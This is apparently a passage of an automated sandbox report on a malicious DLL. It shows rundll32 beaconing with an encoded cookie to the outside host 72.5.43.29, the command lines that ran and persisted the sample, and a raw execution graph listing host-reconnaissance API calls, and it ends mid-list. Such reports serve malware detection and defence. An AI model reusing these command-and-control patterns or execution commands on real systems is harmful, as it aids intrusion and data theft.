Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49762 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:52.723887920 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:53.413911104 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:53 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49763 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:31:56.461824894 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Aug 15, 2024 05:31:57.147458076 CEST | 223 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:31:57 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49764 | 72.5.43.29 | 80 | 7568 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Aug 15, 2024 05:32:03.006439924 CEST | 393 | OUT | GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: Aug 15, 2024 05:32:03.708177090 CEST | Bytes transferred: 223 | Direction: IN | Data: HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:03 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 49765 | Destination IP: 72.5.43.29 | Destination Port: 80 | PID: 7568 | Process: C:\Windows\System32\rundll32.exe
Timestamp: Aug 15, 2024 05:32:09.635644913 CEST | Bytes transferred: 393 | Direction: OUT | Data: GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: Aug 15, 2024 05:32:10.347987890 CEST | Bytes transferred: 223 | Direction: IN | Data: HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:10 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 49766 | Destination IP: 72.5.43.29 | Destination Port: 80 | PID: 7568 | Process: C:\Windows\System32\rundll32.exe
Timestamp: Aug 15, 2024 05:32:12.614826918 CEST | Bytes transferred: 393 | Direction: OUT | Data: GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: Aug 15, 2024 05:32:13.419794083 CEST | Bytes transferred: 223 | Direction: IN | Data: HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:13 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>


Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 49767 | Destination IP: 72.5.43.29 | Destination Port: 80 | PID: 7568 | Process: C:\Windows\System32\rundll32.exe
Timestamp: Aug 15, 2024 05:32:19.989518881 CEST | Bytes transferred: 393 | Direction: OUT | Data: GET / HTTP/1.1
Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFK
User-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: 72.5.43.29
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: Aug 15, 2024 05:32:20.674880981 CEST | Bytes transferred: 223 | Direction: IN | Data: HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 15 Aug 2024 03:32:20 GMT
Content-Length: 94
Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1></BODY></HTML>



Target ID:0
Start time:23:29:20
Start date:14/08/2024
Path:C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):false
Commandline:loaddll64.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll"
Imagebase:0x7ff6cef90000
File size:165'888 bytes
MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:1
Start time:23:29:20
Start date:14/08/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Imagebase:0x7ff6ad640000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):false
Commandline:regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll
Imagebase:0x7ff615620000
File size:25'088 bytes
MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:23:29:21
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObject
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:23:29:24
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServer
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:23:29:27
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerEx
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:23:29:32
Start date:14/08/2024
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u
Imagebase:0x7ff703750000
File size:71'680 bytes
MD5 hash:EF3179D498793BF4234F708D3BE28633
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false


    Execution Graph

    Execution Coverage:8.7%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:25.9%
    Total number of Nodes:1496
    Total number of Limit Nodes:65
36 API calls 9307->9308 9308->9291 9310 7ffe1150f98c abort 36 API calls 9309->9310 9311 7ffe115134db 9310->9311 9319 7ffe1151352d 9311->9319 9320 7ffe11510d9c EnterCriticalSection 9311->9320 9319->9268 9322 7ffe1150f98c abort 36 API calls 9321->9322 9323 7ffe115120cf 9322->9323 9325 7ffe115120ea 9323->9325 9332 7ffe11510d9c EnterCriticalSection 9323->9332 9327 7ffe11512170 9325->9327 9329 7ffe1150e500 abort 36 API calls 9325->9329 9327->9273 9329->9327 9334 7ffe1150c18a 9333->9334 9345 7ffe1150c12f 9333->9345 9335 7ffe1150c20e 9334->9335 9336 7ffe1150c18f 9334->9336 9394 7ffe1150c438 9335->9394 9338 7ffe1150c1f4 9336->9338 9339 7ffe1150c199 9336->9339 9382 7ffe1150c8c4 9338->9382 9341 7ffe1150c217 _vswprintf_s_l 9339->9341 9349 7ffe1150c17b _vswprintf_s_l 9339->9349 9388 7ffe1150c724 9339->9388 9344 7ffe11509540 _handle_error 8 API calls 9341->9344 9346 7ffe1150c397 9344->9346 9345->9335 9345->9339 9345->9341 9347 7ffe1150c15d 9345->9347 9348 7ffe1150c16b 9345->9348 9345->9349 9346->9223 9347->9335 9347->9348 9347->9349 9348->9341 9378 7ffe1150c67c 9348->9378 9349->9341 9402 7ffe1150ca68 9349->9402 9352 7ffe1150bf53 9351->9352 9353 7ffe1150bf6c 9351->9353 9354 7ffe1150c18a 9352->9354 9356 7ffe1150bf93 9352->9356 9368 7ffe1150c12f 9352->9368 9355 7ffe1150f22c _set_errno_from_matherr 15 API calls 9353->9355 9353->9356 9357 7ffe1150c20e 9354->9357 9358 7ffe1150c18f 9354->9358 9359 7ffe1150bf88 9355->9359 9356->9223 9361 7ffe1150c438 _vswprintf_s_l 45 API calls 9357->9361 9363 7ffe1150c1f4 9358->9363 9365 7ffe1150c199 9358->9365 9360 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9359->9360 9360->9356 9372 7ffe1150c17b _vswprintf_s_l 9361->9372 9362 7ffe1150c16b 9366 7ffe1150c67c _vswprintf_s_l 38 API calls 9362->9366 9374 7ffe1150c217 _vswprintf_s_l 9362->9374 9364 7ffe1150c8c4 _vswprintf_s_l 32 API calls 9363->9364 9364->9372 9367 7ffe1150c724 _vswprintf_s_l 32 API calls 9365->9367 9365->9372 9365->9374 9366->9372 9367->9372 9368->9357 9368->9362 9368->9365 9370 
7ffe1150c15d 9368->9370 9368->9372 9368->9374 9369 7ffe11509540 _handle_error 8 API calls 9371 7ffe1150c397 9369->9371 9370->9357 9370->9362 9370->9372 9371->9223 9373 7ffe1150ca68 _vswprintf_s_l 38 API calls 9372->9373 9372->9374 9373->9374 9374->9369 9460 7ffe1150f260 9375->9460 9379 7ffe1150c6af _vswprintf_s_l 9378->9379 9381 7ffe1150c6e3 9379->9381 9406 7ffe1150f290 9379->9406 9381->9349 9384 7ffe1150c8ec _vswprintf_s_l 9382->9384 9383 7ffe1150f22c _set_errno_from_matherr 15 API calls 9385 7ffe1150c8f5 9383->9385 9384->9383 9387 7ffe1150c900 9384->9387 9386 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9385->9386 9386->9387 9387->9349 9389 7ffe1150c745 9388->9389 9390 7ffe1150f22c _set_errno_from_matherr 15 API calls 9389->9390 9393 7ffe1150c790 _vswprintf_s_l 9389->9393 9391 7ffe1150c785 9390->9391 9392 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9391->9392 9392->9393 9393->9349 9395 7ffe1150c45c 9394->9395 9418 7ffe1150b834 9395->9418 9401 7ffe1150c5a2 9401->9349 9404 7ffe1150cb15 _vswprintf_s_l 9402->9404 9405 7ffe1150ca8b 9402->9405 9403 7ffe1150f290 _vswprintf_s_l 38 API calls 9403->9405 9404->9341 9405->9403 9405->9404 9407 7ffe1150f2ba 9406->9407 9410 7ffe1150f2c4 9406->9410 9408 7ffe1150bb4c _vswprintf_s_l 36 API calls 9407->9408 9407->9410 9409 7ffe1150f2f7 9408->9409 9409->9410 9411 7ffe11512d64 _vswprintf_s_l 36 API calls 9409->9411 9410->9381 9412 7ffe1150f327 9411->9412 9413 7ffe1150f381 MultiByteToWideChar 9412->9413 9414 7ffe1150f330 9412->9414 9413->9410 9415 7ffe1150f36d 9413->9415 9414->9415 9417 7ffe1150f343 MultiByteToWideChar 9414->9417 9415->9410 9416 7ffe1150f22c _set_errno_from_matherr 15 API calls 9415->9416 9416->9410 9417->9410 9417->9415 9419 7ffe1150b870 9418->9419 9420 7ffe1150b861 9418->9420 9422 7ffe1150e440 _vswprintf_s_l 16 API calls 9419->9422 9427 7ffe1150b866 9419->9427 9421 7ffe1150f22c _set_errno_from_matherr 15 API calls 9420->9421 9421->9427 9423 7ffe1150b89c 9422->9423 9424 7ffe1150e400 __free_lconv_num 15 
API calls 9423->9424 9426 7ffe1150b8b0 9423->9426 9424->9426 9425 7ffe1150e400 __free_lconv_num 15 API calls 9425->9427 9426->9425 9428 7ffe115105c0 9427->9428 9429 7ffe11510605 9428->9429 9430 7ffe115105ed 9428->9430 9429->9430 9434 7ffe1151061c _vswprintf_s_l 9429->9434 9431 7ffe1150f22c _set_errno_from_matherr 15 API calls 9430->9431 9432 7ffe115105f2 9431->9432 9433 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9432->9433 9444 7ffe1150c585 9433->9444 9438 7ffe1151064f 9434->9438 9439 7ffe11510670 9434->9439 9435 7ffe115107ac 9437 7ffe1150fbf0 _vswprintf_s_l 37 API calls 9435->9437 9436 7ffe11510773 9441 7ffe1150ff50 _vswprintf_s_l 37 API calls 9436->9441 9437->9444 9442 7ffe1151047c _vswprintf_s_l 37 API calls 9438->9442 9439->9435 9439->9436 9440 7ffe115106e9 9439->9440 9443 7ffe115106ad 9439->9443 9446 7ffe1151069f 9439->9446 9445 7ffe11513b40 _vswprintf_s_l 33 API calls 9440->9445 9441->9444 9442->9444 9447 7ffe11510344 _vswprintf_s_l 37 API calls 9443->9447 9444->9401 9453 7ffe1150bbdc 9444->9453 9448 7ffe11510713 9445->9448 9446->9436 9450 7ffe115106a8 9446->9450 9447->9444 9449 7ffe115135a4 _vswprintf_s_l 32 API calls 9448->9449 9451 7ffe11510740 9449->9451 9450->9440 9450->9443 9451->9444 9452 7ffe115101fc _vswprintf_s_l 36 API calls 9451->9452 9452->9444 9454 7ffe1150f148 _vswprintf_s_l 44 API calls 9453->9454 9455 7ffe1150bbf4 9454->9455 9456 7ffe1150bc08 9455->9456 9457 7ffe1150ef44 _vswprintf_s_l 40 API calls 9455->9457 9458 7ffe1150f148 _vswprintf_s_l 44 API calls 9456->9458 9457->9455 9459 7ffe1150bc10 9458->9459 9459->9401 9461 7ffe1150f279 _vswprintf_s_l 9460->9461 9464 7ffe1150e5fc 9461->9464 9465 7ffe1150e64f 9464->9465 9466 7ffe1150e629 9464->9466 9465->9466 9467 7ffe1150e65d 9465->9467 9468 7ffe1150f22c _set_errno_from_matherr 15 API calls 9466->9468 9469 7ffe1150bb4c _vswprintf_s_l 36 API calls 9467->9469 9470 7ffe1150e62e 9468->9470 9473 7ffe1150e66a 9469->9473 9471 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9470->9471 9484 
7ffe1150bc8b 9471->9484 9472 7ffe11512be4 _vswprintf_s_l GetStringTypeW 9472->9473 9473->9472 9474 7ffe1150e6a1 9473->9474 9475 7ffe1150e90f 9474->9475 9476 7ffe1150f22c _set_errno_from_matherr 15 API calls 9474->9476 9478 7ffe1150f22c _set_errno_from_matherr 15 API calls 9475->9478 9480 7ffe1150ebe3 _vswprintf_s_l 9475->9480 9477 7ffe1150e953 9476->9477 9481 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9477->9481 9479 7ffe1150ebd8 9478->9479 9482 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9479->9482 9483 7ffe1150f22c _set_errno_from_matherr 15 API calls 9480->9483 9480->9484 9481->9475 9482->9480 9483->9484 9484->9223 9519 7ffe11509460 9485->9519 9488 7ffe11505d38 9562 7ffe11504dc0 9488->9562 9489 7ffe11505d27 9526 7ffe115050d0 9489->9526 9492 7ffe11505d36 9492->9114 9494 7ffe115050d0 61 API calls 9494->9492 9496 7ffe1150929f 9495->9496 9497 7ffe115092cc 9495->9497 9500 7ffe11507d50 10 API calls 9496->9500 9498 7ffe115092d6 9497->9498 9499 7ffe1150930a 9497->9499 9501 7ffe11507c50 10 API calls 9498->9501 9502 7ffe11509341 9499->9502 9503 7ffe11509314 9499->9503 9504 7ffe115092ab LoadLibraryW 9500->9504 9505 7ffe115092e2 GetProcAddress 9501->9505 9507 7ffe1150937f GetCommandLineW CommandLineToArgvW 9502->9507 9508 7ffe1150934b 9502->9508 9506 7ffe11507d50 10 API calls 9503->9506 9509 7ffe11507e50 2 API calls 9504->9509 9511 7ffe11507e50 2 API calls 9505->9511 9512 7ffe11509320 LoadLibraryW 9506->9512 9510 7ffe115093f8 9507->9510 9518 7ffe115093a0 9507->9518 9513 7ffe11507c50 10 API calls 9508->9513 9509->9497 9510->9117 9511->9499 9515 7ffe11507e50 2 API calls 9512->9515 9516 7ffe11509357 GetProcAddress 9513->9516 9514 7ffe115093ed LocalFree 9514->9510 9515->9502 9517 7ffe11507e50 2 API calls 9516->9517 9517->9507 9518->9514 9520 7ffe11507d50 10 API calls 9519->9520 9521 7ffe11509481 9520->9521 9522 7ffe11509260 19 API calls 9521->9522 9523 7ffe11509490 9522->9523 9524 7ffe11507e50 2 API calls 9523->9524 9525 7ffe11505d23 9524->9525 9525->9488 
9525->9489 9527 7ffe11507d50 10 API calls 9526->9527 9528 7ffe1150512d GetVolumeInformationW 9527->9528 9529 7ffe11507e50 2 API calls 9528->9529 9530 7ffe11505180 GetComputerNameW GetComputerNameExW GetUserNameW 9529->9530 9531 7ffe115051f5 9530->9531 9599 7ffe115069f0 9531->9599 9534 7ffe11507c50 10 API calls 9535 7ffe11505291 9534->9535 9536 7ffe11507d50 10 API calls 9535->9536 9537 7ffe115052a2 9536->9537 9643 7ffe11505d60 9537->9643 9540 7ffe11505caf 9541 7ffe11507e50 2 API calls 9540->9541 9543 7ffe11505cbc 9541->9543 9544 7ffe11507e50 2 API calls 9543->9544 9546 7ffe11505cc6 9544->9546 9545 7ffe11505ca2 9680 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9545->9680 9549 7ffe11509540 _handle_error 8 API calls 9546->9549 9547 7ffe11505c95 9679 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9547->9679 9552 7ffe11505cd6 9549->9552 9550 7ffe11507d50 10 API calls 9558 7ffe1150533a 9550->9558 9552->9492 9553 7ffe11501f20 39 API calls 9553->9558 9554 7ffe11507e50 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9554->9558 9555 7ffe11507d50 10 API calls 9556 7ffe11505c18 OpenMutexW 9555->9556 9557 7ffe11505c48 CloseHandle 9556->9557 9556->9558 9557->9558 9558->9545 9558->9547 9558->9550 9558->9553 9558->9554 9558->9555 9559 7ffe11505c78 GetTickCount SleepEx 9558->9559 9561 7ffe115054d8 9558->9561 9678 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9558->9678 9559->9558 9563 7ffe11507d50 10 API calls 9562->9563 9564 7ffe11504e31 CreateMutexW 9563->9564 9565 7ffe11504e68 9564->9565 9566 7ffe11504e52 Sleep CloseHandle 9564->9566 9567 7ffe11507e50 2 API calls 9565->9567 9566->9565 9568 7ffe11504e72 9567->9568 9690 7ffe11506300 9568->9690 9570 7ffe11504e77 Sleep 9730 7ffe11504d80 GetTickCount 9570->9730 9573 7ffe11507d50 10 API calls 9574 7ffe11504eab 9573->9574 9575 7ffe11507d50 10 API calls 9574->9575 9576 7ffe11504eca 9575->9576 9577 7ffe11507d50 10 API calls 9576->9577 9578 7ffe11504ee5 9577->9578 9579 
7ffe11507d50 10 API calls 9578->9579 9580 7ffe11504ef6 wcscat wcscpy 9579->9580 9735 7ffe11504270 9580->9735 9583 7ffe11504fb7 9585 7ffe11507e50 2 API calls 9583->9585 9584 7ffe11507d50 10 API calls 9593 7ffe11504f5b wcscat wcscpy 9584->9593 9586 7ffe11504fc1 9585->9586 9587 7ffe11507e50 2 API calls 9586->9587 9588 7ffe11504fcb 9587->9588 9589 7ffe11507e50 2 API calls 9588->9589 9590 7ffe11504fd5 9589->9590 9591 7ffe11507e50 2 API calls 9590->9591 9592 7ffe11504fdf 9591->9592 9594 7ffe11509540 _handle_error 8 API calls 9592->9594 9595 7ffe11504270 74 API calls 9593->9595 9596 7ffe11504ff3 9594->9596 9597 7ffe11504fa9 9595->9597 9596->9492 9596->9494 9598 7ffe11507e50 2 API calls 9597->9598 9598->9583 9600 7ffe11506a57 9599->9600 9601 7ffe11506a84 9599->9601 9602 7ffe11507d50 10 API calls 9600->9602 9603 7ffe11506ac2 9601->9603 9604 7ffe11506a8e 9601->9604 9605 7ffe11506a63 LoadLibraryW 9602->9605 9607 7ffe11506acc 9603->9607 9608 7ffe11506af9 9603->9608 9606 7ffe11507c50 10 API calls 9604->9606 9609 7ffe11507e50 2 API calls 9605->9609 9610 7ffe11506a9a GetProcAddress 9606->9610 9611 7ffe11507d50 10 API calls 9607->9611 9612 7ffe11506b37 9608->9612 9613 7ffe11506b03 9608->9613 9609->9601 9617 7ffe11507e50 2 API calls 9610->9617 9618 7ffe11506ad8 LoadLibraryW 9611->9618 9615 7ffe11506b75 9612->9615 9616 7ffe11506b41 9612->9616 9614 7ffe11507c50 10 API calls 9613->9614 9619 7ffe11506b0f GetProcAddress 9614->9619 9621 7ffe11506bac 9615->9621 9622 7ffe11506b7f 9615->9622 9620 7ffe11507c50 10 API calls 9616->9620 9617->9603 9623 7ffe11507e50 2 API calls 9618->9623 9624 7ffe11507e50 2 API calls 9619->9624 9625 7ffe11506b4d GetProcAddress 9620->9625 9627 7ffe11506bea memcpy_s 9621->9627 9628 7ffe11506bb6 9621->9628 9626 7ffe11507d50 10 API calls 9622->9626 9623->9608 9624->9612 9629 7ffe11507e50 2 API calls 9625->9629 9630 7ffe11506b8b LoadLibraryW 9626->9630 9633 7ffe11506bff RtlGetVersion 9627->9633 9631 7ffe11507c50 10 API calls 9628->9631 9629->9615 9634 7ffe11507e50 2 
